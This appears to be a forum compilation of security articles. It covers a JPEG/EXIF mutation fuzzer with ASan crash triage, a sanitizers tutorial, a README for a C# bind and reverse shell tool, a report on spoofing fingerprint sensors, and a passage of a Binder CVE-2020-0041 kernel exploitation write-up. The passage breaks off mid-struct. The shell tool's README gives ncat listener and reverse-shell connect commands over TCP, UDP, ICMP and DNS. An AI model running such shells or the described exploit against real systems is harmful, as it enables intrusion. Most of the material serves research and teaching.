Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==18831==ABORTING This is wonderful. Not only do we get detailed information but ASan also classifies the bug class for us, tells us the crash address and provides a nice stack trace. As you can see, we were performing a 4-byte read operation in the parseIFD function inside of exif.c. READ of size 4 at 0xb4d00758 thread T0 #0 0x415b9d in parseIFD /root/exif/exif.c:2356 #1 0x408f10 in createIfdTableArray /root/exif/exif.c:271 #2 0x4076ba in main /root/exif/sample_main.c:63 #3 0xb77d0ef0 in __libc_start_main ../csu/libc-start.c:308 #4 0x407310 in _start (/usr/bin/exifsan+0x2310) Since this is all standard binary output now, we can actually triage these crashes and try to make sense of them. Let’s first try to deduplicate the crashes. It’s possible here that all 30 of our crashes are the same bug. It’s also possible that we have 30 unique crashes (not likely lol). So we need to sort that out. Let’s again appeal to a Python script, we’ll iterate through this folder, run the ASan enabled binary against each crash and log where the crashing address is for each. We’ll also try to capture if it’s a 'READ' or 'WRITE' operation as well. So for example, for crash.252.jpg, we’ll format the log file as: crash.252.HBO.b4f00758.READ and we’ll write the ASan output to the log. This way we know the crash image that caused it, the bug class, the address, and the operation before we even open the log. (I’ll post the triage script at the end, it’s so gross ugh, I hate it.) After running the triage script on our crashes folder, we can now see we have triaged our crashes and there is something very interesting. crash.102.HBO.b4f006d4.READ crash.102.jpg crash.129.HBO.b4f005dc.READ crash.129.jpg crash.152.HBO.b4f005dc.READ crash.152.jpg crash.317.HBO.b4f005b4.WRITE crash.317.jpg crash.285.SEGV.00000000.READ crash.285.jpg ------SNIP----- After a big SNIP there, out of my 30 crashes, I only had one WRITE operation. You can’t tell from the snipped output but I also had a lot of SEGV bugs where a NULL address was referenced (0x00000000). Let’s also check in on our modified fuzzer that was running only the magic() mutator for 100,000 iterations and see if it turned up any bugs. 
root@kali:~/crashes2# ls crash.10354.jpg crash.2104.jpg crash.3368.jpg crash.45581.jpg crash.64750.jpg crash.77850.jpg crash.86367.jpg crash.94036.jpg crash.12771.jpg crash.21126.jpg crash.35852.jpg crash.46757.jpg crash.64987.jpg crash.78452.jpg crash.86560.jpg crash.9435.jpg crash.13341.jpg crash.23547.jpg crash.39494.jpg crash.46809.jpg crash.66340.jpg crash.78860.jpg crash.88799.jpg crash.94770.jpg crash.14060.jpg crash.24492.jpg crash.40953.jpg crash.49520.jpg crash.6637.jpg crash.79019.jpg crash.89072.jpg crash.95438.jpg crash.14905.jpg crash.25070.jpg crash.41505.jpg crash.50723.jpg crash.66389.jpg crash.79824.jpg crash.89738.jpg crash.95525.jpg crash.18188.jpg crash.27783.jpg crash.41700.jpg crash.52051.jpg crash.6718.jpg crash.81206.jpg crash.90506.jpg crash.96746.jpg crash.18350.jpg crash.2990.jpg crash.43509.jpg crash.54074.jpg crash.68527.jpg crash.8126.jpg crash.90648.jpg crash.98727.jpg crash.19441.jpg crash.30599.jpg crash.43765.jpg crash.55183.jpg crash.6987.jpg crash.82472.jpg crash.90745.jpg crash.9969.jpg crash.19581.jpg crash.31243.jpg crash.43813.jpg crash.5857.jpg crash.70713.jpg crash.83282.jpg crash.92426.jpg crash.19907.jpg crash.31563.jpg crash.44974.jpg crash.59625.jpg crash.77590.jpg crash.83284.jpg crash.92775.jpg crash.2010.jpg crash.32642.jpg crash.4554.jpg crash.64255.jpg crash.77787.jpg crash.84766.jpg crash.92906.jpg That’s a lot of crashes! Getting Serious, Conclusion The fuzzer could be optimized a ton, it’s really crude at the moment and only meant to demonstrate very basic mutation fuzzing. The bug triaging process is also a mess and felt really hacky the whole way, I guess I need to watch some more @gamozolabs streams. Maybe next time we do fuzzing we’ll try a harder target, write the fuzzer in a cool language like Rust or Go, and we’ll try to really refine the triaging process/exploit one of the bugs! Thanks to everyone referenced in the blogpost, huge thanks. Until next time! 
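Before the full listings below, here is a rough sketch (my addition, not part of the original post) of how the log names produced by the triage step, crash.<iteration>.<class>.<address>.<operation>, can be bucketed to get a quick count of how many crashes are actually unique:

#!/usr/bin/env python3
# Sketch: bucket triage logs named crash.<N>.<class>.<address>.<operation>
# into unique (class, address, operation) signatures. The path is an assumption.
import os
from collections import Counter

LOG_DIR = "/root/crashes/"  # same directory the triage script writes its logs into

def unique_crashes(log_dir):
    buckets = Counter()
    for name in os.listdir(log_dir):
        parts = name.split(".")
        # Skip the raw crash.<N>.jpg samples; only look at the 5-part log names.
        if len(parts) != 5 or parts[-1] == "jpg":
            continue
        _, _, bug_class, address, operation = parts
        buckets[(bug_class, address, operation)] += 1
    return buckets

if __name__ == "__main__":
    for signature, count in unique_crashes(LOG_DIR).most_common():
        print(signature, count)

Keying on the faulting address alone will over-split crashes that hit the same underlying bug at different addresses, so a better signature would also include the top stack frame from the ASan report, but this is enough to spot obvious duplicates.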
Code JPEGfuzz.py #!/usr/bin/env python3 import sys import random from pexpect import run from pipes import quote # read bytes from our valid JPEG and return them in a mutable bytearray def get_bytes(filename): f = open(filename, "rb").read() return bytearray(f) def bit_flip(data): num_of_flips = int((len(data) - 4) * .01) indexes = range(4, (len(data) - 4)) chosen_indexes = [] # iterate selecting indexes until we've hit our num_of_flips number counter = 0 while counter < num_of_flips: chosen_indexes.append(random.choice(indexes)) counter += 1 for x in chosen_indexes: current = data[x] current = (bin(current).replace("0b","")) current = "0" * (8 - len(current)) + current indexes = range(0,8) picked_index = random.choice(indexes) new_number = [] # our new_number list now has all the digits, example: ['1', '0', '1', '0', '1', '0', '1', '0'] for i in current: new_number.append(i) # if the number at our randomly selected index is a 1, make it a 0, and vice versa if new_number[picked_index] == "1": new_number[picked_index] = "0" else: new_number[picked_index] = "1" # create our new binary string of our bit-flipped number current = '' for i in new_number: current += i # convert that string to an integer current = int(current,2) # change the number in our byte array to our new number we just constructed data[x] = current return data def magic(data): magic_vals = [ (1, 255), (1, 255), (1, 127), (1, 0), (2, 255), (2, 0), (4, 255), (4, 0), (4, 128), (4, 64), (4, 127) ] picked_magic = random.choice(magic_vals) length = len(data) - 8 index = range(0, length) picked_index = random.choice(index) # here we are hardcoding all the byte overwrites for all of the tuples that begin (1, ) if picked_magic[0] == 1: if picked_magic[1] == 255: # 0xFF data[picked_index] = 255 elif picked_magic[1] == 127: # 0x7F data[picked_index] = 127 elif picked_magic[1] == 0: # 0x00 data[picked_index] = 0 # here we are hardcoding all the byte overwrites for all of the tuples that begin (2, ) elif picked_magic[0] == 2: if picked_magic[1] == 255: # 0xFFFF data[picked_index] = 255 data[picked_index + 1] = 255 elif picked_magic[1] == 0: # 0x0000 data[picked_index] = 0 data[picked_index + 1] = 0 # here we are hardcoding all of the byte overwrites for all of the tuples that being (4, ) elif picked_magic[0] == 4: if picked_magic[1] == 255: # 0xFFFFFFFF data[picked_index] = 255 data[picked_index + 1] = 255 data[picked_index + 2] = 255 data[picked_index + 3] = 255 elif picked_magic[1] == 0: # 0x00000000 data[picked_index] = 0 data[picked_index + 1] = 0 data[picked_index + 2] = 0 data[picked_index + 3] = 0 elif picked_magic[1] == 128: # 0x80000000 data[picked_index] = 128 data[picked_index + 1] = 0 data[picked_index + 2] = 0 data[picked_index + 3] = 0 elif picked_magic[1] == 64: # 0x40000000 data[picked_index] = 64 data[picked_index + 1] = 0 data[picked_index + 2] = 0 data[picked_index + 3] = 0 elif picked_magic[1] == 127: # 0x7FFFFFFF data[picked_index] = 127 data[picked_index + 1] = 255 data[picked_index + 2] = 255 data[picked_index + 3] = 255 return data # create new jpg with mutated data def create_new(data): f = open("mutated.jpg", "wb+") f.write(data) f.close() def exif(counter,data): command = "exif mutated.jpg -verbose" out, returncode = run("sh -c " + quote(command), withexitstatus=1) if b"Segmentation" in out: f = open("crashes2/crash.{}.jpg".format(str(counter)), "ab+") f.write(data) if counter % 100 == 0: print(counter, end="\r") if len(sys.argv) < 2: print("Usage: JPEGfuzz.py <valid_jpg>") else: filename = sys.argv[1] counter 
= 0 while counter < 100000: data = get_bytes(filename) functions = [0, 1] picked_function = random.choice(functions) if picked_function == 0: mutated = magic(data) create_new(mutated) exif(counter,mutated) else: mutated = bit_flip(data) create_new(mutated) exif(counter,mutated) counter += 1 triage.py #!/usr/bin/env python3 import os from os import listdir def get_files(): files = os.listdir("/root/crashes/") return files def triage_files(files): for x in files: original_output = os.popen("exifsan " + x + " -verbose 2>&1").read() output = original_output # Getting crash reason crash = '' if "SEGV" in output: crash = "SEGV" elif "heap-buffer-overflow" in output: crash = "HBO" else: crash = "UNKNOWN" if crash == "HBO": output = output.split("\n") counter = 0 while counter < len(output): if output[counter] == "=================================================================": target_line = output[counter + 1] target_line2 = output[counter + 2] counter += 1 else: counter += 1 target_line = target_line.split(" ") address = target_line[5].replace("0x","") target_line2 = target_line2.split(" ") operation = target_line2[0] elif crash == "SEGV": output = output.split("\n") counter = 0 while counter < len(output): if output[counter] == "=================================================================": target_line = output[counter + 1] target_line2 = output[counter + 2] counter += 1 else: counter += 1 if "unknown address" in target_line: address = "00000000" else: address = None if "READ" in target_line2: operation = "READ" elif "WRITE" in target_line2: operation = "WRITE" else: operation = None log_name = (x.replace(".jpg","") + "." + crash + "." + address + "." + operation) f = open(log_name,"w+") f.write(original_output) f.close() files = get_files() triage_files(files) Tags: exif fuzzing jpeg mutation parsing Python Updated: April 04, 2020 Sursa: https://h0mbre.github.io/Fuzzing-Like-A-Caveman/#
-
Detect Bugs using Google Sanitizers Apr 03, 2019 Shawn Tutorials Google Sanitizers are a set of dynamic code analysis tools to detect common bugs in your code, including Thread Sanitizer: detect data races, thread leaks, deadlocks Address Sanitizer: detect buffer overflows, dangling pointer dereferences Leak Sanitizer: part of Address Sanitizer, detect memory leaks Undefined Behavior Sanitizer: detect integer overflow, float-number overflow Memory Sanitizer: detect uninitialized memory reads Preparation For Windows users, install gcc with MinGW, or install Clang For Mac users, install Clang using `xcode-select --install` For Linux users, make sure you have gcc installed. Open CLion and make sure that the run button is clickable with toolchains configured correctly. Run Program with Sanitizer To run a program with a sanitizer, we need to pass a special -fsanitize flag to the compiler. Common options include: -fsanitize=address, -fsanitize=thread, -fsanitize=memory, -fsanitize=undefined, -fsanitize=leak. A full list of options can be found here. Note that it is not possible to combine more than one of the -fsanitize=address, -fsanitize=thread, and -fsanitize=memory checkers in the same program, so you may need to toggle the options multiple times for comprehensive checking. For testing, let's add the following line to the CMakeLists.txt file: set(CMAKE_C_FLAGS "${CMAKE_CXX_FLAGS} -fsanitize=address -g") When you run the code, you should be able to see a sanitizer tab next to the console. Thread Sanitizer Example Here is a poorly-written multithreading program: int counter = 0; pthread_mutex_t lock; void *inc() { pthread_mutex_lock(&lock); // lock not initialized counter++; // thread contention pthread_mutex_unlock(&lock); return NULL; } void thread_bugs() { pthread_t tid; for (int i = 0; i < 2; ++i) pthread_create(&tid, NULL, inc, NULL); printf("%d", counter); // print the result before join pthread_join(tid, NULL); // the first thread is not joined } Add the following line to the CMakeLists.txt to enable the Thread Sanitizer: set(CMAKE_C_FLAGS "${CMAKE_CXX_FLAGS} -fsanitize=thread -g") When the program is executing, the sanitizer will generate a report for thread-related bugs. Be aware that your program might run significantly slower with sanitizers enabled. The sanitizer noticed that two threads are reading/writing to the same memory location at the line counter++;, since the lock is used before being initialized. There is also a data race between counter++ and the print statement since the main thread did not wait for one of the child threads. Finally, there is a thread leak for the same reason as above. Address Sanitizer Example To enable the Address Sanitizer, you need to add the following line to the CMakeLists.txt: set(CMAKE_C_FLAGS "${CMAKE_CXX_FLAGS} -fsanitize=address -g") It helps you detect heap overflow, which may happen when you incorrectly calculate the size. Here is an example of overflowing a stack-allocated array. The Address Sanitizer also checks for use of freed pointers. Note that it shows you where the memory is allocated and freed. Here is a silly example of freeing the same memory twice, but it will be less noticeable when different pointers are pointing to the same heap location. References https://clang.llvm.org/docs/UsersManual.html https://www.jetbrains.com/help/clion/google-sanitizers.html Sursa: https://shawnzhong.com/2019/04/03/detect-bugs-using-google-sanitizers/
-
SharpOffensiveShell A sort of simple shell which supports multiple protocols. This project is just for improving my C# coding ability. The SharpOffensiveShell DNS mode uses the native Windows API instead of the Nslookup command to perform DNS requests. QuickStart SharpOffensiveShell supports .NET Framework 2.0 csc SharpOffensiveShell.cs TCP For bind shell sharpoffensiveshell.exe tcp listen 0.0.0.0 8080 ncat -v 1.1.1.1 8080 For reverse shell ncat -lvp 8080 sharpoffensiveshell.exe tcp connect 1.1.1.1 8080 UDP For bind shell sharpoffensiveshell.exe udp listen 0.0.0.0 8080 ncat -u -v 1.1.1.1 8080 For reverse shell ncat -u -lvp 8080 When the reverse connection is accepted, press Enter to make the prompt display. sharpoffensiveshell.exe udp connect 1.1.1.1 8080 ICMP git clone https://github.com/inquisb/icmpsh sysctl -w net.ipv4.icmp_echo_ignore_all=1 cd icmpsh && python icmpsh-m.py listenIP reverseConnectIP sharpoffensiveshell.exe icmp connect listenIP DNS pip install dnslib git clone https://github.com/sensepost/DNS-Shell For direct mode python DNS-Shell.py -l -d [Server IP] sharpoffensiveshell.exe dns direct ServerIP Domain For recursive mode DNS-Shell.py -l -r [Domain] sharpoffensiveshell.exe dns recurse Domain Sursa: https://github.com/darkr4y/SharpOffensiveShell
-
Attackers can bypass fingerprint authentication with an ~80% success rate Fingerprint-based authentication is fine for most people, but it's hardly foolproof. Dan Goodin - 4/8/2020, 4:00 PM For decades, the use of fingerprints to authenticate users to computers, networks, and restricted areas was (with a few notable exceptions) mostly limited to large and well-resourced organizations that used specialized and expensive equipment. That all changed in 2013 when Apple introduced TouchID. Within a few years, fingerprint-based validation became available to the masses as computer, phone, and lock manufacturers added sensors that gave users an alternative to passwords when unlocking the devices. Although hackers managed to defeat TouchID with a fake fingerprint less than 48 hours after the technology was rolled out in the iPhone 5S, fingerprint-based authentication over the past few years has become much harder to defeat. Today, fingerprints are widely accepted as a safe alternative to passwords when unlocking devices in many, but not all, contexts. A very high probability A study published on Wednesday by Cisco’s Talos security group makes clear that the alternative isn’t suitable for everyone—namely those who may be targeted by nation-sponsored hackers or other skilled, well-financed, and determined attack groups. The researchers spent about $2,000 over several months testing fingerprint authentication offered by Apple, Microsoft, Samsung, Huawei, and three lock makers. The result: on average, fake fingerprints were able to bypass sensors at least once roughly 80 percent of the time. The percentages are based on 20 attempts for each device with the best fake fingerprint the researchers were able to create. While Apple products limit users to five attempts before asking for the PIN or password, the researchers subjected the devices to 20 attempts (that is, multiple groups of one or more attempts). Of the 20 attempts, 17 were successful. Other products tested permitted significantly more or even an unlimited number of unsuccessful tries. The report was quick to point out that the results required several months of painstaking work, with more than 50 fingerprint molds created before getting one to work. The study also noted that the demands of the attack—which involved obtaining a clean image of a target’s fingerprint and then getting physical access to the target’s device—meant that only the most determined and capable adversaries would succeed. “Even so, this level of success rate means that we have a very high probability of unlocking any of the tested devices before it falls back into the PIN unlocking," Talos researchers Paul Rascagneres and Vitor Ventura wrote. “The results show fingerprints are good enough to protect the average person's privacy if they lose their phone. However, a person that is likely to be targeted by a well-funded and motivated actor should not use fingerprint authentication.” The devices that were the most susceptible to fake fingerprints were the AICase padlock and Huawei’s Honor 7x and Samsung’s Note 9 Android phones, all of which were bypassed 100 percent of the time. Fingerprint authentication in the iPhone 8, MacBook Pro 2018, and the Samsung S10 came next, where the success rate was more than 90 percent.
Five laptop models running Windows 10 and two USB drives—the Verbatim Fingerprint Secure and the Lexar Jumpdrive F35—performed the best, with researchers achieving a 0-percent success rate. The chart below summarizes the results (chart: Cisco Talos). The orange lines are the percent of success with the direct collection method, the blue lines with the image sensor method and the yellow line with the picture method. The reason for the better results from the Windows 10 machines, the researchers said, is that the comparison algorithm for all of them resided in the OS, and therefore the result was shared among all platforms. The researchers cautioned against concluding that the zero success rate for Windows 10 devices and the USB drives meant they were safer. “We estimate that with a larger budget, more resources and a team dedicated to this task, it is possible to bypass these systems, too,” they wrote. One other product tested—a Samsung A70—also attained a 0-percent success rate, but researchers attributed this to the difficulty getting authentication to work even when it received input from real fingerprints that had been enrolled. Defeating fingerprint authentication: A how-to There are two steps to fingerprint authentication: capturing, in which a sensor generates an image of the fingerprint, and analysis, which compares the inputted fingerprint to the fingerprint that’s enrolled. Some devices use firmware that runs on the sensor to perform the comparison while others rely on the operating system. Windows Hello included in Windows 10, for example, performs the comparison from the OS using Microsoft’s Biometric Devices Design Guide. There are three types of sensors. Capacitive sensors use a finger’s natural electrical conductivity to read prints, as ridges touch the reader while valleys do not. Optical sensors read the image of a fingerprint by using a light source that illuminates ridges in contact with the reader and reads them through a prism. Ultrasonic sensors emit an ultrasonic pulse that generates an echo that’s read by the sensor, with ridges and valleys registering different signatures. The researchers devised three techniques for collecting the fingerprint of a target. The first is direct collection, which involves a target pressing a finger on a brand of clay known as Plastiline. With that, the attacker obtains a negative of the fingerprint. The second technique is to have the target press a finger onto a fingerprint reader, such as the kind that’s used at airports, banks, and border crossings. The reader would then capture a bitmap image of the print. The third is to capture a print on a drinking glass or other transparent surface and take a photograph of it. After the print is collected using the print reader or photo methods, certain optimizations are often required. For prints recorded on a fingerprint reader, for instance, multiple images had to be merged together to create a single image that was large enough to pass for a real fingerprint. Below is an example of the process, performed on fingerprints the FBI obtained from prohibition-era gangster Al Capone. Prints captured on a glass and then photographed, meanwhile, had to be touched up with filters to increase the contrast. Then the researchers used digital sculpting tools such as ZBrush to create a 3D model based on the 2D picture. The 2-D image is on the left; the 3-D model is on the right (image: Cisco Talos).
Once the fingerprint was collected from either a scanner or glass and then optimized, the researchers replicated it onto a mold, which was made from either fabric glue or silicon. When working against capacitive sensors, materials also had to include graphite and aluminum powder to increase conductivity. To be successfully passed off as a real finger, the mold had to be a precise size. A variance of just 1 percent too big or too small would cause the attack to fail. This demand complicated the process, since the molds had to be cured to create rigidity and remove toxins. The curing often caused the molds to shrink. Casting the print onto a mold was done with either a 25-micron or 50-micron resolution 3D printer. The former was more accurate but required an hour to print a single mold. The latter took half as long but wasn’t as precise. Once researchers created a mold, they pressed it against the sensor to see if it treated the fake print as the real one enrolled to unlock the phone, laptop, or lock. The chart above showing the results tracks how various collection methods worked against specific devices. In seven cases, direct collection worked the best, and in only one case did a different method—a fingerprint reader—perform better. Making it work in the real world The higher success rate of direct collection doesn’t necessarily mean it’s the most effective collection method in real-world attacks, since it requires that the adversary trick or force a target to press a finger against a squishy piece of clay. By contrast, obtaining fingerprints from print readers or from photos of smudges on glass may be better since nation-state attackers may have an easier time recovering print images from an airport or customs checkpoint or surreptitiously obtaining a drinking glass after a target uses it. Another possibility is breaching a database of fingerprint data, as hackers did in 2014 when they stole 5.6 million sets of fingerprints from the US Office of Personnel Management. “The direct collection is always the better [option], because we directly have the mold (on the platiline),” Rascagneres, the Talos researcher, wrote in an email. “The size is perfect; we don’t need a 3D printer. This is the more efficient approach. The two other collection methods also work, but with lower success as expected.” The researchers balanced the stringent demands of the attack with a relatively modest budget of just $2,000. “The point of the low budget was to ensure the scenario was as realistic as possible," Rascagneres told me. “We determined if we could do it for $2k then it was reasonably feasible. What we found was that while we could keep the price point low, the process of making functional prints was actually very complex and time consuming.” The takeaway, the researchers said, isn’t that fingerprint authentication is too weak to be trusted. For most people in most settings, it’s perfectly fine, and when risks increase temporarily—such as when police with a search warrant come knocking on a door—users can usually disable fingerprint authentication and fall back to password or PIN verification. At the same time, users should remember that fingerprint authentication is hardly infallible. “Any fingerprint cloning technique is extremely difficult, making fingerprint authentication a valid method for 95 percent of the population,” Ventura, the other Talos researcher, wrote in an email.
“People that have a low risk profile and don’t need to worry about nation-state level threat actors are fine. The remaining 5 percent could be exposed and may want to take other precautions.” Sursa: https://arstechnica.com/information-technology/2020/04/attackers-can-bypass-fingerprint-authentication-with-an-80-success-rate/
-
Exploiting the kernel with CVE-2020-0041 to achieve root privileges Posted on Apr 08, 2020 | Author: Eloi Sanfelix and Jordan Gruskovnjak A few months ago we discovered and exploited a bug in the Binder driver, which we reported to Google on December 10, 2019. The bug was included in the March 2020 Android Security Bulletin, with CVE-2020-0041. In the previous post we described the bug and how to use it to escape the Google Chrome sandbox. If you haven't read that post, please do so now in order to understand what bug we are exploiting and what primitives we have available. In this post we'll describe how to attack the kernel and obtain root privileges on a Pixel 3 device using the same bug. Reminder: memory corruption primitives As described in our previous post, we can corrupt parts of a validated binder transaction while it's being processed by the driver. There are two stages at which these values are used that we could target for our attack: When the transaction is received, it gets processed by the userspace components. This includes libbinder (or libhwbinder if using /dev/hwbinder) as well as upper layers. This is what we used to attack the Chrome browser process in the previous post. When userspace is done with the transaction buffer, it asks the driver to free it with the BC_FREE_BUFFER command. This results in the driver processing the transaction buffer. Let's analyze the transaction buffer cleanup code in the binder driver while considering that we could have corrupted the transaction data: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 static void binder_transaction_buffer_release(struct binder_proc *proc, struct binder_buffer *buffer, binder_size_t failed_at, bool is_failure) { int debug_id = buffer->debug_id; binder_size_t off_start_offset, buffer_offset, off_end_offset; binder_debug(BINDER_DEBUG_TRANSACTION, "%d buffer release %d, size %zd-%zd, failed at %llx\n", proc->pid, buffer->debug_id, buffer->data_size, buffer->offsets_size, (unsigned long long)failed_at); if (buffer->target_node) [1] binder_dec_node(buffer->target_node, 1, 0); off_start_offset = ALIGN(buffer->data_size, sizeof(void *)); off_end_offset = is_failure ? 
failed_at : off_start_offset + buffer->offsets_size; [2] for (buffer_offset = off_start_offset; buffer_offset < off_end_offset; buffer_offset += sizeof(binder_size_t)) { struct binder_object_header *hdr; size_t object_size; struct binder_object object; binder_size_t object_offset; binder_alloc_copy_from_buffer(&proc->alloc, &object_offset, buffer, buffer_offset, sizeof(object_offset)); object_size = binder_get_object(proc, buffer, object_offset, &object); if (object_size == 0) { pr_err("transaction release %d bad object at offset %lld, size %zd\n", debug_id, (u64)object_offset, buffer->data_size); continue; } hdr = &object.hdr; switch (hdr->type) { case BINDER_TYPE_BINDER: case BINDER_TYPE_WEAK_BINDER: { struct flat_binder_object *fp; struct binder_node *node; fp = to_flat_binder_object(hdr); [3] node = binder_get_node(proc, fp->binder); if (node == NULL) { pr_err("transaction release %d bad node %016llx\n", debug_id, (u64)fp->binder); break; } binder_debug(BINDER_DEBUG_TRANSACTION, " node %d u%016llx\n", node->debug_id, (u64)node->ptr); [4] binder_dec_node(node, hdr->type == BINDER_TYPE_BINDER, 0); binder_put_node(node); } break; ... case BINDER_TYPE_FDA: { ... /* * the source data for binder_buffer_object is visible * to user-space and the @buffer element is the user * pointer to the buffer_object containing the fd_array. * Convert the address to an offset relative to * the base of the transaction buffer. */ [5] fda_offset = (parent->buffer - (uintptr_t)buffer->user_data) + fda->parent_offset; for (fd_index = 0; fd_index < fda->num_fds; fd_index++) { u32 fd; binder_size_t offset = fda_offset + fd_index * sizeof(fd); binder_alloc_copy_from_buffer(&proc->alloc, &fd, buffer, offset, sizeof(fd)); [6] task_close_fd(proc, fd); } } break; default: pr_err("transaction release %d bad object type %x\n", debug_id, hdr->type); break; } } } At [1] the driver checks if there is a target binder node for the current transaction, and if it exists it decrements its reference count. This is interesting because it could trigger the release of such a node if its reference count reaches zero, but we do not have control of this pointer. At [2] the driver iterates through all objects in the transaction, and goes into a switch statement where the required cleanup is performed for each object type. For types BINDER_TYPE_BINDER and BINDER_TYPE_WEAK_BINDER, the cleanup involves looking up an object using fp->binder at [3] and then decrementing the reference count at [4]. Since fp->binder is read from the transaction buffer, we can actually prematurely release node references by replacing this value with a different one. This can in turn lead to use-after-free of binder_node objects. Finally, for BINDER_TYPE_FDA objects we could corrupt the parent->buffer field used at [5] and end up closing arbitrary file descriptors on a remote process. In our exploit we targeted the reference counts of BINDER_TYPE_BINDER objects to cause a use-after-free on objects of type struct binder_node. This is exactly the same type of use-after-free we described in our OffensiveCon presentation about CVE-2019-2205. However some of the techniques we used in that exploit are not available to us in recent kernels anymore. Aside: using binder to talk to yourself The binder driver is designed in such a way that transactions can only be sent to handles you have received from other processes or to the context manager (handle 0). 
In general, when one wants to talk to a service, they first request a handle to the context manager (servicemanager, hwservicemanager or vndservicemanager for the three Binder domains used in current versions of Android). If a service creates a sub-service or an object on behalf of the client, then the service will send a handle such that the client can talk to the new object. In some situations, it would be beneficial to control both ends of the communication, e.g. to have better timing control for race conditions. In our particular case, we require knowing the address of the receiving-side binder mapping while we are sending the transaction to avoid a crash. Additionally, in order to cause a use-after-free with the corruption primitive we have, the receiving process has to create binder nodes with the fp->binder field equal to the sg_buf value we are corrupting with (which belongs to the sender address space). The easiest way to meet all these constraints is to control both the sending and the receiving end of a transaction. In that case, we have access to all the required values and do not need to use an info-leak to retrieve them from a remote process. However, we are not allowed to register services through the context manager from unprivileged applications, so we cannot go the normal route. Instead, we used the ITokenManager service in the /dev/hwbinder domain to setup the communication channel. To our knowledge, this service was first publicly used by Gal Beniamini in this Project Zero report: Note that in order to pass the binder instance between process A and process B, the "Token Manager" service can be used. This service allows callers to insert binder objects and retrieve 20-byte opaque tokens representing them. Subsequently, callers can supply the same 20-byte token, and retrieve the previously inserted binder object from the service. The service is accessible even to (non-isolated) app contexts (http://androidxref.com/8.0.0_r4/xref/system/sepolicy/private/app.te#188). We use this very same mechanism in our exploit in order to have a handle to our own "process". Note however that "process" here does not really mean an actual process, but a binder_proc structure associated to a binder file descriptor. This means we can open two binder file descriptors, create a token through the first file descriptor and retrieve it from the second one. With this, we have received a handle owned by the first file descriptor, and can now send binder transactions between the two. Leaking data with the binder_node use-after-free Binder nodes are used by the driver in two different ways: as part of transaction contents in order to pass them from one process to another, or as targets of a transaction. When used as part of a transaction, these nodes are always retrieved from a rb-tree of nodes and properly reference counted. When we cause a use-after-free of a node, it also gets removed from the rb-tree. For this reason, we can only have dangling pointers to freed nodes when used as targets of a transaction, since in this case pointers to the actual binder_node are stored by the driver in transaction->target_node. There are quite a few references to target_node in the binder driver, but many of them are performed in the sending path of a transaction or in debug code. 
From the others, the transaction receipt path provides us a way to leak some data back to userland: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 struct binder_transaction_data *trd = &tr.transaction_data; ... if (t->buffer->target_node) { struct binder_node *target_node = t->buffer->target_node; struct binder_priority node_prio; [1] trd->target.ptr = target_node->ptr; trd->cookie = target_node->cookie; node_prio.sched_policy = target_node->sched_policy; node_prio.prio = target_node->min_priority; binder_transaction_priority(current, t, node_prio, target_node->inherit_rt); cmd = BR_TRANSACTION; } else { trd->target.ptr = 0; trd->cookie = 0; cmd = BR_REPLY; } ... [2] if (copy_to_user(ptr, &tr, trsize)) { if (t_from) binder_thread_dec_tmpref(t_from); binder_cleanup_transaction(t, "copy_to_user failed", BR_FAILED_REPLY); return -EFAULT; } ptr += trsize; At [1] the driver extracts two 64-bit values from the target_node into the transaction_data structure. This structure is later copied to userland at [2]. Therefore, if we receive a transaction after we have freed its target_node and replaced it by another object, we can read out two 64-bit fields at the offsets corresponding to ptr and cookie. If we look at this structure on gdb for a build of a recent pixel 3 kernel, we can see these fields at offsets 0x58 and 0x60 respectively: (gdb) pt /o struct binder_node /* offset | size */ type = struct binder_node { /* 0 | 4 */ int debug_id; /* 4 | 4 */ spinlock_t lock; /* 8 | 24 */ struct binder_work { /* 8 | 16 */ struct list_head { /* 8 | 8 */ struct list_head *next; /* 16 | 8 */ struct list_head *prev; /* total size (bytes): 16 */ } entry; /* 24 | 4 */ enum {BINDER_WORK_TRANSACTION = 1, BINDER_WORK_TRANSACTION_COMPLETE, BINDER_WORK_RETURN_ERROR, BINDER_WORK_NODE, BINDER_WORK_DEAD_BINDER, BINDER_WORK_DEAD_BINDER_AND_CLEAR, BINDER_WORK_CLEAR_DEATH_NOTIFICATION} type; /* total size (bytes): 24 */ } work; /* 32 | 24 */ union { /* 24 */ struct rb_node { /* 32 | 8 */ unsigned long __rb_parent_color; /* 40 | 8 */ struct rb_node *rb_right; /* 48 | 8 */ struct rb_node *rb_left; /* total size (bytes): 24 */ } rb_node; /* 16 */ struct hlist_node { /* 32 | 8 */ struct hlist_node *next; /* 40 | 8 */ struct hlist_node **pprev; /* total size (bytes): 16 */ } dead_node; /* total size (bytes): 24 */ }; /* 56 | 8 */ struct binder_proc *proc; /* 64 | 8 */ struct hlist_head { /* 64 | 8 */ struct hlist_node *first; /* total size (bytes): 8 */ } refs; /* 72 | 4 */ int internal_strong_refs; /* 76 | 4 */ int local_weak_refs; /* 80 | 4 */ int local_strong_refs; /* 84 | 4 */ int tmp_refs; /* 88 | 8 */ binder_uintptr_t ptr; /* 96 | 8 */ binder_uintptr_t cookie; /* 104 | 1 */ struct { /* 104: 7 | 1 */ u8 has_strong_ref : 1; /* 104: 6 | 1 */ u8 pending_strong_ref : 1; /* 104: 5 | 1 */ u8 has_weak_ref : 1; /* 104: 4 | 1 */ u8 pending_weak_ref : 1; /* total size (bytes): 1 */ }; /* 105 | 2 */ struct { /* 105: 6 | 1 */ u8 sched_policy : 2; /* 105: 5 | 1 */ u8 inherit_rt : 1; /* 105: 4 | 1 */ u8 accept_fds : 1; /* 105: 3 | 1 */ u8 txn_security_ctx : 1; /* XXX 3-bit hole */ /* 106 | 1 */ u8 min_priority; /* total size (bytes): 2 */ }; /* 107 | 1 */ bool has_async_transaction; /* XXX 4-byte hole */ /* 112 | 16 */ struct list_head { /* 112 